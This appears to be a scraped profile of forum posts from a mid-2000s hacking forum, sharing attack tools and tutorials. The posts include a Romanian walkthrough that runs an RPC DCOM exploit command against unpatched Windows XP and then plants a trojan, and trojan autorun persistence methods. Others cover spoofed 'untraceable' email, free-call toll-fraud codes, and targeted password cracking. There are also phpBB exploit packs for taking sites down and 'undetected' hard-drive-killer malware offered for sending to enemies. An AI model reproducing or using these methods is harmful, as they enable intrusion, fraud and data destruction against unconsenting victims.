virusz
-
Posts
1253 -
Joined
-
Last visited
-
Days Won
6
Posts posted by virusz
-
-
Metasploit took the security world by storm when it was released in 2004. No other new tool even broke into the top 15 of this list, yet Metasploit comes in at #5, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits.This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. Similar professional exploitation tools, such as Core Impact and Canvas already existed for wealthy users on all sides of the ethical spectrum. Metasploit simply brought this capability to the masses.
version 2.6
for windows
http://www.metasploit.com/tools/framework-2.6.exe
for linux and mac and sun
http://www.metasploit.com/images/os/osx.gif
version 3.0
for linux and mc and sun
http://www.metasploit.com/projects/Framework/msf3/download.html?Release=alpha-r3
3nJoy!
-
I dont take Responsability if you get your a*s in jail for using this. use it at your own risk.
The latest version of the Uncapping Kit fromtheoryshare. Learn to uncapyour modem step by step with pictures. NewFeatures include updatedfirmware and eurodocsis support
http://rapidshare.de/files/13189106/Cable_Modem_Uncapping_Kit-www.WebXposed.de.rar.html
password: .webxposed.de -
Cum sa patrunzi intr-un sistem de operare (Windows XP si SP1)
Salut, sa incepem cu inceputul: Treaba "merge" atat in retea cat si in afara retelei in care te afli, dar mai nou providerii de servicii internet au inchis porturile folosite in general la exploatarea sistemelor. Am sa va explic cum faceti "treaba" in retea, tot asa se face si in afara doar ca va trebui sa aveti noro (sa nu fie inchise principalele porturi. ...metode sunt multe, va voi explica o metoda simpla si functionala. Presupun ca ati auzit de "blaster" sau "sasser"
,poate v-ati confruntat cu ei, sunt doi virusi care patrund intr-un calculator fara ca voi sa executati ceva sau sa intrati pe o pagina ciudata... Windows XP si Windows XP + Sp1 sunt vulnerabile: Sistemele Windows XP Home, Pro sunt vulnerabile la "blaster" si "sasser", Windows XP Pro + sp1 este vulnerabil doar la "sasser".. Oare ce inseamna "blaster", este numele unui virus care patrunde in calculator cu Windows XP (fara update-uri), el foloseste porturile: 135,139,445,539 , in general 135. Ah.."sasser" este tot un virus asemanator lui "blaster" dar acesta patrunde prin alta matoda si foloseste portul 445. .Cum patrundem intrun calculator care are Windows XP (fara update-uri). 1.Cautam cu ajutorul unui motor de cautare, "rpc dcom exploit" (sursa o gasim mai usor) compilam sursa (daca nu aveti posibilitatea, cautati mai bine, veti da si de exploitul deja compilat).
2.Cautam tot cu ajutorul unui motor de cautare: a. un scanner de porturi cu care scanam porturile 135,139 etc... sau b. un scanner pentru vulnerabilitatea "rpc dcom" - o varianta simpla.
3.Avem nevoie de un client (pentru conectare la calculatorul "spart" - putty sau NetCat sunt cele mai bune pentru asa ceva. !!!Avem tot ce ne trebuie, sa ii dam drumul: Rulam scannerul pentru vulnerabilitatea "rpc dcom", scriem ip-urile (intreaga clasa) care dorim sa fie scanate, asteptam sa gasim un calculator vulnerabil, sa presupunem ca am gasit unul: 21.242.53.87 Pornim consola (start>run> cmd), ne ducem acolo unde am pus exploitul "rpc dcom" care presupunem ca are numele "dcom.exe",dam comanda: dcom.exe -d 21.242.53.87 -t 1 -r 0100139d -p 135 -l 7315 Dupa ce am dat comanda, daca victima nu are firewall.. ne v-a aparea ceva de genu "c:windowssystem32" de acum nu aveti decat sa ii puneti un troian sau sa va deschideti un port anume.. si sa ii dati comenzi, sa il spionati si alte cele...
metoda veche dar inca functionala
lolikz -
A very quick half-open portscanner with optional multithreaded protocol specific probing tool.
Download:
http://www.bindshell.net/tools/synscan/syn...can-3.1.tar.bz2
-
This program performs reverse DNS lookups for network blocks or an input file. The requests can be performed mulit-threaded.
Usage:
./res <subnet or filename to resolve> <forks>
Download:
http://www.bindshell.net/tools/massresolve/res.c
-
A small utility,for quickly and easily generating lists of IP addresses.
Download:
-
cautatzi UpLink , mie mi-a placut....
-
===========================================
How to autorun a program in Windows:
===========================================
There are many ways .exe,.bat,.vbs,.com, etc programs can autostart
on a target computer.
1. Winstart.bat on older systems - Winstart.bat will start with
windows every
time the computer boots on older machines. Any command prompt
commands can be
used in the batch file.
===================================================================
2. Startup Folder - The startup folder is the most basic way of
getting an
executable to start with windows. This method is easy to detect and
will be
found. If the method is used I would suggest to have it not matter
if it is found
(use your imagination) and/or have an alternative auto startup method
as well.
The default startup folder for windows 9x & ME is found at:
C:windowsstart menuprogramsstartup
Windows 2k, XP, 2003 use :
C:Documents and SettingsAdministratorStart MenuPrograms
(Administrator can be changed to another user name if you know what
it is.)
Any executable files placed in this folder will be automaticaly
executed at
startup.
====================================================================
3. Win.ini & System.ini - The Win.ini & System.ini methods are old
favorites.
Find the files are located in c:windows or c:winnt depending on
the
version of windows and where it is installed.
To use Win.ini to autostart your program first open Win.ini with a
text editor
find [windows] or add it if its not there and then add (making sure
path is
right) load=Whatever.exe and then run=Whatever.exe.
Ex.
[windows]
load=Whatever.exe
run=Whatever.exe
System.ini is very simple too, first open System.ini in notepad and
then find
[boot] in the text and add Shell=Explorer.exe Whatever.exe.
Ex.
[boot]
Shell=Explorer.exe Whatever.exe
======================================================================
4. Registry - Registry is probably the most popular method of auto
starting
trojans, worms and viruses. Most people do not know how to remove
registry entries or how to even find them via regedit.
To make software run automaticaly a string can be added to either of
the
following registry keys:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServi
ces]
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServi
cesOnce]
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce]
For the above keys all you have to do is add a string with what ever
name you
want and data of what ever path to your exe, such as:
Name | Type | Data
-------------------
Windows Update | REG_SZ | c:windowssystem32Whatever.exe
Another key is:
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnceE
x
-
Sending Anonymous Emails
Sometimes it is neccasary to send an email anonymously.
There are several web based utilities that allow this, but each one registers the ip info in the headers which allows tracing. They also
will not allow you to use a proxy and utilize their service. This is for security reasons.
My definition of anonymous includes the email addresses appearing as if they have been sent from whatever address you specify as well
as no accurate record of your IP in the headers of the mail that could be traced back to you.
The method that follows supports my definition of anonymous.
Amazingly, all you need to accomplish this is telnet and a smtp server. Allow me to break it down.
Telnet is a software application that connects one machine to another, allowing you to log on to that other machine as a user.
If you don't have telnet, you can easily download it for free from the web - do a search on "telnet" or "download telnet"in any search
engine.
...and just for the sake of being thorough...
What is SMTP?
SMTP stands for "Simple Mail Transfer Protocol"
Basiclly just a protocol for sending e-mail.
Where do you get a SMTP server?
Heres a few links, but as always be aware that these sites may not be here forever or their content may change. Searching for "SMTP servers"
or "SMTP server list" should produce effective results.
http://www.gr0w.com/help/email_help_smtp_servers.htm
http://www.uic.edu/depts/accc/ecomm/smtpmove/isps.html
http://www.thebestfree.net/free/freesmtp.htm
http://www.registerdirect.co.nz/help/smtp_servers.html
http://www.bu.edu/pcsc/email/remote/smtplist.html
Once you've selected a server, open the command prompt, and type:
telnet xxxxxx.com 25
(obviously replace the x's with the SMTP server you've selected)
now type the following:
--------------------------------
HELO targetsmailserver.com
MAIL FROM: whoever@whatever.com
RCPT TO: target@address.com
DATA
from: whoever@whatever.com
subject: whatever
received: xxx.xxx.xxx.xxx
x-header: xxx.xxx.xxx.xxx
The body of the message goes here
.
----------------------------------------
*Note 1: Remember to end with "." on a line by itself as directed.
*Note 2: Adding x-header and received allows you to alter the IP information found in the headers of the mail, making it untracable and
totally anonymous**
*Note 3: There are ISPs that have port 25 (SMTP) blocked. Be sure your settings and ISP allow connections to port 25. If all else fails,
get the SMTP sever address from your ISP.
Thats all it takes to send a totally anonymous email. Hope you enjoyed.
-
Free SMS Messaging With Nokia
Section 1: The Introduction
----------------------------
Once again here is another tutorial written by your's truly. I was
going to implement this concept into a program, but it came to me
early on that the idea just wasn't going to work. So instead I bring
this information to you in my typical tutorial format. So read, and
enjoy...
Section 2: The Method
----------------------
This method is known to work on the nokia 3210, 5610, and 9110 models.
To perform this trick we will first turn off your phone. Then turn
your phone on and enter your pin. Once you have done this, punch in
the following string...
*#746025625#
If your model works with this trick then you will get a "SIM CLOCK
STOP ALLOWED" message on the screen. That's it, now you can send
sms messages for free. Be warned, this trick sometimes doesn't work
on certain networks so I wouldn't go overboard with this trick until
you receive your first bill. If you get no signs of the sms messaging
you did after performing this trick on your bill then feel free to
chat all you want. Have fun! =)
Section 3: The Conclusion
--------------------------
Well once again I hope you enjoyed reading this as much as I enjoyed
writing this. I'm right now trying to work with programming under the
SymbianOS (for those a bit illiterate in this field, basically,
programming nokia phones) so hopefully you will all see some nokia
apps made by me coming out soon enough. And of course, I have a
couple of tutorial ideas I might pick back up on when I get the chance,
but life has been keeping me busy lately so don't expect any immediate
release of anything. Well anyways, until next time...
-
Making Free Calls With Nokia
Section 1: The Introduction
----------------------------
Tired of wondering if you have gone over your minute limit? Tired of
trying to guess how many minutes you are going to use? Tired of even
paying for the shit? Then this is the tutorial for you. This is a
short and simple tutorial that will teach you, the reader, how to
make free calls on your Nokia cell phone. So let's proceed...
Section 2: So How Do We Do It?
-------------------------------
This technique works on most of the nokia models out today. Meaning
this will work for you as long as you don't have an old fossil sort
of model. So what you will first do is turn on your phone. Then punch
in the code *3001#12345#. This will bring up the NAM programming menu.
From here go down and select the option NAM 1. Once you are in the NAM
1 menu, go down until you see "Emergency Numbers", and enter. You then
go down until you see an empty slot and enter the empty slot. Then
simply punch in the number that you want to call and exit the NAM
programming menu. Now when you dial up the number, the number will be
treated as an emergency call number, which will therefore put the
phone into emergency call mode (which you can exit out of once you are
finished with your call). No number in the emergency call number list
is ever billed to you. There are a couple of other things you can do
from within the NAM programming menu, but that can be saved for another
time, and another tutorial.
Section 3: The Conclusion
--------------------------
Once again I hoped you enjoyed reading this as much as I enjoyed
writing this. This trick for the most part only works on the Nokia
60 series, though I believe may also work for a couple of other models.
Be sure to also note that this trick also doesn't work on all
networks. Therefore, if you indeed do have a compatible model, first
try it with just one or two calls before you start going wild. Then
just wait for the bill, and if nothing shows up about the calls you
made with this trick, then feel free to call away. Anyways, until next
time...
Note: If you have a question or comment and feel the need to reach me
then you can do so at murdermouse@informationleak.net and I will try to get back
with you as soon as possible.
-
zuper nice, trecetzi si p'aici: http://www.kismetwireless.net/download.shtml
-
Sprajax is the first web security scanner developed specifically to scan AJAX web applications for security vulnerabilities. Denim Group, an IT consultancy specializing in web application security, recognized that there were no tools available on the market able to scan AJAX. AJAX allows web-based applications a higher degree of user-interactivity, a feature with growing popularity among developers.
[url]http://www.denimgroup.com/Sprajax/Default.aspx[/url] -
Actually I released this a bit while ago, but I wasn't active here on Igniteds when I released it so I never had the chance to post it here. Anyways, the Anti School Kit (or simply ASK) offers the following...
Guides
------
Hacking Win98: by Halla
How to bypass restrictions to get to the command prompt: by Halla &
Murder Mouse
Thawing Out DeepFreeze: by Murder Mouse
Hacking The School Network: by Murder Mouse
Hijacking The School PA System: by Murder Mouse
Net Send Time Bomb: by Murder Mouse
How to bypass web filters: by Halla
Hacking Windows NT/2K/XP: by Halla
Tools
-----
Silent Web Cgi Shell: description self-explanatory
bindin: identifies which novell users have what permissions
chknull: cracks novell accounts
Deep UnFreezer: unfreezes affected versions of DeepFreeze
FileDate Changer v1.1: description self-explanatory
Haxernet Explorer v2.01: a browser that uses translation services
to browse sites not allowed by the web filtering software.
NetStumbler: scans and reports wireless access points
OnSite: browses the cached network
Pandora: kit full of novell related warez
SharesFinder: uh, finds open shares of course
SMAC: spoofs MAC address
snlist: CLI app that is used for the same purpose that ONSite is
userdump: naturally dumps a list of users on the network
The programs are meant to compliment the guides, and the guides meant to show you how to apply the included tools (in short for some of you who may need to be reminded, don't just jump at the programs, take a little time out of your life to read the tutorials included). Anyways, here is the link, and be sure to tell me what you think (it's like I make a rhyme, everytime)...
Download:
-
This is a full hacked kb905474 hotfix.
Just install this as you would normaly install the hotfix.
reboot when installed.
After reboot no more nag screens and you can update again.
Download:
http://files2.9down.com:8000/crack/kb90547...4_1.5.532.2.rar
-
Warning
=======
This information should only be used to test your own server's security. Do not attempt to "test" a website's security without permission from it's administrator. Hacking is illegal.
Quick Intro
=========
If you're not familiar with dictionary-based password cracking then this tutorial is not for you.
Using dictionaries to crack passwords can be very frustrating – Especially after you've waited over two days for a program to use a 240MB list that doesn't seem to have that password. So what do you do? There's a way to dramatically increase your chances of cracking that password. How? By making your own dictionary. No, I don’t mean creating a list by hand in notepad (Don't worry it's all mostly automated)
Tools needed
===========
PassParse:
http://darknet.org.uk/content/files/passwo...d/passparse.zip
RemDupes:
http://ksoze.deny.de/RemDupes2.exe
Brutus:
http://217.125.24.22/h/brutus.zip
Intellitamper:
http://www.intellitamper.com/download/inte...amper_v2.07.exe
The Steps
=========
1. Alright. What we need to do first is extract all text from the website. Sounds like a huge task but IntelliTamper will make things a little easier for us. Okay let's open IntelliTamper, enter the website, and press the "Start Search" button. What this will do is find all (or most) pages of the site. Once it's finished, save all the pages it found into one directory on your computer (Right-Click > Save).
2. Now let's navigate to the directory where we saved the files. Next we're gonna make a simple batch file that will read all the files and send the output to a text file named "ppin.txt". Open Notepad and enter the following:
CODE
type *.* > ppin.txt
and save it as "lister.bat" (without quotations of course). Once you've saved it, run it. Ppin.txt should have been created. (Note the file MUST be name ppin)
3. Next we're going to create the actual list itself. If you open ppin.txt you'll see that it's just a bunch of html/text. We're gonna use Pass Parse to extract all the words and put in list format. Alright. Copy the file "ppin.txt" and paste it into the same directory as your Pass Parse program. If there’s already a file named ppin then overwrite it. Now launch Pass Parse. The DOS Prompt should have shown for a second or less. Your new password list, "ppout.txt", was just created.
4. Almost finished. If you open your new password list you'll notice that there are many words used more than once. To take care of the problem we'll use RemDupes. This program will remove all duplicated words and sort your list in alphabetical order. So open your copy of RemDupes, click "Add", and navigate to your password file (ppout.txt). Click "Find Dupes" and when that's finished click "Save List". Your list is completely finished.
"Positive Authentication with User: Admin Password: inagokart"
-
MAC SPOOFER is a MAC Address Modifying Utility (spoofer) for Windows 2000, XP, and Server 2003 systems, regardless of whether the manufactures allow this option or not. MAC SPOOFER is a MUST-HAVE TOOL for IT, Security, Networking professionals, gamers, and everyone who needs a MAC Addresses Changer.
Key Features
Easy usage and simple configuration, highly intuitive interface makes operation easy for both beginners and power users.
Able to manage up to 16 network interfaces.
In detail, it does not change the hardware built-in MAC-address, but changes software based MAC Address on the Windows NT, 2000, XP and 2003.
Display all available network adpaters.
Works with wireless network adapters.
Low resource required.
Download:
-
Do not run self the 2 harddrive killers, send it to someone.
have you an annoying enemy? if so, send him one of the 2 undetected harddrive killers.
the Advanced Batch Helper.exe is a Multiple Hard Drive Killer and kills the victims harddrive forever, this fine exe lets rotate the enemys harddrive disc in lightspeed. it will kill alldrive=c d e f g h i j k l m n o p q r s t u v w x y z and all removable media drives too.
the Setup.exe will delete the victims or your enemys
%SystemRoot%system32
%SystemRoot%system
%SystemRoot%Cursor s
%SystemRoot%Fonts
C:pROGRA~1
C:DOCUME~1
%systemroute%Windows.halo
and it will
shutdown -s -t 00
exit
the victims pc
the 2 files are completly undetected by jotti's online virus scanner.
pass for the file is key
do not abuse this files.
Download:
-
WebCracker 3.0 Beta 2 (wc30b2.zip) is a password cracker designed to brute force login/password combinations for web sites that use HTTP-based password authentication. [script kiddies read: get free pr0n site access!] Features: supports sessions so you can save and resume cracking from where you left off, automatically logs all valid accounts found, supports running multiple instances so you can crack multiple targets at once, support for proxy servers, allows customized User ID and Password dictionary attacks, automatically tries the user id as the first password - a common weakness on many systems, allows on-the-fly variable replacement so user ids can be incorporated into passwords, allows on-the-fly ID and/or password case changes for case sensitive servers, uses standard HTTP 1.0 calls for compatibility with just about any web site, minimum password length check so you don't send passwords shorter than the target system allows, easy to use interface and options, extremely fast, much more. New in this release: multi-threaded cracking for faster results, now supports CGI and other "non-standard" login scripts, new and much improved user interface, no limit to the size of password lists which can be used, extended logging capabilities, much better progress indicators, statistics screen that provides details about the speed and efficiency of your cracking sessions. Freeware.
Download:
-
ASMCrack is a unix password security tool. It checks the password file by trying whether a given word matches an encrypted password that was within the password file. To do so it uses very speed optimized 386 assembly routines, with pentium alignment and command order optimisations. ASMCrack supports five cracking modes: creating words by the login/geco field of the pwd file, and try these pwds only on the corresponding user, trying words, that are read from a dictionary file, creating words by Brute Force (e.g. aaa aab aac aad aae aaf aag ... zzy zzz), creating words by Smart Force (this is a statistic optimized modification of Brute Force, that is about 15 times more effective when cracking (pronouncable) pwds that only consist of letters), creating words by combining a certain number of syllables, that have been extracted from a dictionary file. ASMCrack supports parallel processing and clustered computing environments for increased cracking speed. This is the first public release of this program and it rivals John the Ripper in performance and speed.
Download:
-
An Md5 hashes cracker for lists (lists of hash or lists of word, but an incremental mode is available aswell), faster that groar, this version use a list of hash (no combos list (user:hash) like in groar), if you need a tool to separate combo into 2 singles lists, you can use raptor III, that you can find easily on the web.
download for windows:
http://www.hot.ee/abargadon/PhpBB%20pass%2...20extractor.zip
source code:
http://www.hot.ee/abargadon/PhpBB%20epass%...0source%20C.zip
-
This new release of Kr4ck3r comes equipped with many new features which enhance and simplify the process of auditing MD5 hash.
We have built on the concept of clones by introducing Virtual Clones which run logically in the background while auditing. Also, we've included hands-free progression through-out the entire auditing process.
Knowing the last line of defense is a strong password, we have included a totally new feature to allow operators to audit Md5 hash stored in a remote database. With a totally new design and focus on detail, this version has certainly become the ultimate Md5 hash auditor.
Download:
-
About PHLAK
The story begins with two coffee drinkers from Longview, Texas. James Hartman and Shawn Hawkins were like any other Linux users, hitting Slashdot in the morning, researching numerous open source repositories, and experimenting with interesting projects. Always security minded, the two developers started looking at live security distributions. Never being completely satisfied with existing projects, the two started on a mission to create the most complete live security Linux distribution. So began the research. Instead of starting from scratch they decided to look at some of the other preexisting live CD distibution, finally settling on Morphix due to its modularity. After three months of development the initial version was released. Two moths later 0.2 was released with all fifteen pieces of flair.
PHLAK is designed as the security professional's tool kit. It is not meant to turn the unexperienced into a security guru overnight. However, anyone with the desire can learn from the included tools and documentation.
Like any good tool, PHLAK can be used by Sith or Jedi alike. Included in the distribution are all the mainstream tools such as: nmap, nessus, snort, the coronor's toolkit, ethereal, and several other security packages. Some of the other lesser known, yet equally effective, tools include: hping2, proxychains, lczroex, ettercap, kismet, hunt, achilies, brutus, and many others. Make no mistake, this is a real Linux distribution including many common services such as apache, mysql, ssh, iptables, and most other services that are included on any other standard distribution.
To make things more user-friendly, PHLAK currently includes two fast, light-weight window managers, XFCE4 (the default) and Fluxbox. From these window managers the user has easy access to the powerful documentation system. Currently included in the XFCE4 user interface are quick-start buttons to initiate services and different firewall settings for those who are command line impaired.
Remember that PHLAK is still in its infancy. It is constantly progressing towards the level the developers had originally envisioned. The future versions of PHLAK will better harness the modularity of its Morphix origin as well as increase its base of hardware support and detection. The project team is dedicated to expanding and updating the PHLAK security arsenal as well as making it more available to a broader user base. They foresee it becoming the Professional Hacker's Linux Assault Kit. Make no mistake, the Internet is an unfriendly environment. Arm yourself well.
Tool List:
http://www.phlak.org/tools.htm
Downloads:
-
Pack containing phpBB exploits, usefull when your trying to take down a site that is running phpBB.
Download:
http://rapidshare.de/files/3861527/G00B3RS...t_pack.rar.html
ASTALAVISTA SECURITY TOOLBOX DVD v2.0
in Cosul de gunoi
Posted
Astalavista's Security Toolbox DVD v2.0 is considered to be the largest and most comprehensive Information Security archive.As always we are committed to provide you with a resource for all of your security and hacking interests, in an interactive way! The Information found on the Security Toolbox DVD has been carefully selected, so that you will only browse through quality information and tools.No matter if you are a computer enthusiast, a computer geek, a newbie looking for information on "how to hack", or an ITSecurity professional looking for quality and up to date information for offline use or just for convenience, we are sure that you will be satisfied, even delighted by the DVD!
have phun!